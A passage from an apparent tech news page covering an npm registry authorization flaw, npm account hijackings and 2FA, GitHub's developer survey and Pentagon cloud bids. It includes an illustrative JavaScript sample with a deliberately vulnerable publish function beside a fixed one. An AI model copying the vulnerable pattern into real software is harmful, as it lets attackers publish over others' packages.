This vulnerability existed in the npm registry beyond the timeframe for which we have telemetry to determine whether it has ever been exploited maliciously. However, we can say with high confidence that this vulnerability has not been exploited maliciously during the timeframe for which we have available telemetry, which goes back to September 2020.
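The authorization mismatch GitHub describes above, modelled as an added example (not npm's or GitHub's code) against a toy in-memory registry: the path-based authorization check and the manifest-based update are shown side by side with the fixed pipeline, which pins both steps to the same package identity. All package names, owners and function names are constructed for illustration.

```javascript
// Constructed sample registry: two packages owned by two different users.
// Built fresh on each call so a cross-package write in one run cannot
// leak into another.
function makeRegistry() {
  return {
    '@alice/widget': { owner: 'alice', versions: ['1.0.0'] },
    '@bob/toolkit':  { owner: 'bob',   versions: ['2.3.1'] },
  };
}

// Authorization service: decides based on the package named in the
// request URL path, which is the only thing it sees.
function authorize(registry, user, pathPackageName) {
  const pkg = registry[pathPackageName];
  return pkg !== undefined && pkg.owner === user;
}

// Vulnerable pipeline (the pattern described in the post): authorization
// keys on the URL path, but the update service takes the target package
// from the uploaded manifest. The two can name different packages.
function publishVulnerable(registry, user, pathPackageName, manifest) {
  if (!authorize(registry, user, pathPackageName)) {
    return { ok: false, reason: 'forbidden' };
  }
  const target = registry[manifest.name]; // trusts the upload, not the path
  if (!target) return { ok: false, reason: 'unknown package' };
  target.versions.push(manifest.version);
  return { ok: true, published: manifest.name };
}

// Hardened pipeline: reject any request whose manifest name disagrees with
// the path, then authorize and update using that single, validated name.
function publishFixed(registry, user, pathPackageName, manifest) {
  if (manifest.name !== pathPackageName) {
    return { ok: false, reason: 'name mismatch' };
  }
  if (!authorize(registry, user, pathPackageName)) {
    return { ok: false, reason: 'forbidden' };
  }
  const target = registry[pathPackageName];
  if (!target) return { ok: false, reason: 'unknown package' };
  target.versions.push(manifest.version);
  return { ok: true, published: pathPackageName };
}

module.exports = { makeRegistry, authorize, publishVulnerable, publishFixed };
```

A registry-side detection for this class of bug is the same comparison the fixed path makes: log and alert whenever a publish request's path package and manifest package disagree, since a legitimate client never sends them mismatched.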

BleepingComputer adds: Both announcements come not too long after popular npm libraries, 'ua-parser-js,' 'coa,' and 'rc' were hijacked in a series of attacks aimed at infecting open source software consumers with trojans and crypto-miners. These attacks were attributed to the compromise of npm accounts [1, 2] belonging to the maintainers behind these libraries.

None of the maintainers of these popular libraries had two-factor authentication (2FA) enabled on their accounts, according to GitHub. Attackers who manage to hijack the npm accounts of maintainers can trivially publish new versions of these legitimate packages after contaminating them with malware. As such, to minimize the possibility of such compromises recurring in the near future, GitHub will start requiring npm maintainers to enable 2FA sometime in the first quarter of 2022.

Programming

GitHub's Annual Developer Survey Finds Remote Developers Aren't Returning to the Office (zdnet.com) 28

GitHub's annual report on its user community "combined telemetry data from over four million repositories with direct survey from over 12,000 developers to identify current trends among software development companies and open-source projects," reports InfoQ.

ZDNet notes the data shows that remote developers "aren't planning to go back to the office." Before the pandemic, only 41% of developers worked at an office either full-time or part-time, but of the 12,000 surveyed in GitHub's 2021 State of the Octoverse report, just 10.7% expect to go back to the office after the pandemic ends... Pre-pandemic, 28.1% of developers had hybrid arrangements but after the pandemic, 47.8% expect some hybrid arrangements. Before the pandemic, 26.5% worked in places where all workers were remote. Now, 38.8% expect to be fully remote.

ZDNet also highlighted some other general statistics: GitHub says it now has 73 million developer users and that it gained 16 million new users in 2021. Users created 61 million new repositories and there were 170 million pull requests that got merged into projects... One of the biggest projects on GitHub is the container software Docker, which has a whopping 632,000 contributors from 215 countries and consists of 49,593 packages.

That's more than an order of magnitude larger than the estimated number of Linux contributors — and implies that for every 117 developers now on GitHub, there was one who contributed to Docker.

Meanwhile, 2021's most popular language rankings for GitHub are the same as 2020, with one exception: Shell has risen one position to become the 8th most popular language, edging out C (which now ranks as the 9th most popular language).

And InfoQ summarized some other interesting statistics from GitHub's report:
  • Good, reliable, and up-to-date documentation can boost productivity by 50%.
  • Documentation is often under-invested.
  • The number of pull requests merged within the workday goes down by 17% with each additional reviewer.

Google

Pentagon Asks Amazon, Google, Microsoft and Oracle for Bids on New Cloud Contracts (theguardian.com) 14

The U.S. General Services Administration said Friday that the Defense Department has solicited bids from Amazon, Google, Microsoft and Oracle for cloud contracts. From a report: The outreach comes after the Pentagon set aside a highly contested $10 billion contract that Microsoft had won and Amazon had challenged. The value of the new contracts is not known, but the Defense Department estimates it could run into the multiple billions of dollars. The new effort, known as Joint Warfighting Cloud Capability, or JWCC, appears likely to bolster the top global cloud infrastructure providers, Amazon and Microsoft, although it could also provide more credibility to two smaller entities.

"The Government anticipates awarding two IDIQ contracts -- one to Amazon Web Services (AWS) and one to Microsoft Corporation (Microsoft) -- but intends to award to all Cloud Service Providers (CSPs) that demonstrate the capability to meet DoD's requirements," the GSA said in its announcement. An indefinite delivery, indefinite quantity, or IDIQ, contract includes an indefinite amount of services for a specific period of time.
